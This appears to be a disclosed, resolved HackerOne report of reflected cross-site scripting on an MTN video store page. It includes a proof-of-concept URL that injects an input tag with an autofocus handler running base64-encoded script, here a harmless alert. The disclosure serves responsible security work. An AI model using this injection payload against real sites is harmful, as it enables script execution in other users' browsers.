XSS at videostore.mtnonline.com/GL/*.aspx via all parameters

Disclosed: 2022-05-01 21:20:58 By homosec To mtn_group

Medium

Vulnerability Details

PoC ``` https://videostore.mtnonline.com/GL/MyAccount.aspx?PId=126&CID=5&OprId=11%27><input%20onfocus=eval(atob(%27YWxlcnQoJ1hTUycp%27))%20autofocus> ``` Symbols <"/'> are not filtered that alloweds to inject HTML code. {F1353609} ## Impact XSS at videostore.mtnonline.com

Actions

View on HackerOne

Report Stats

Report ID: 1244731
State: Closed
Substate: resolved
Upvotes: 4

XSS at videostore.mtnonline.com/GL/*.aspx via all parameters

Vulnerability Details

Actions

Report Stats

Share this report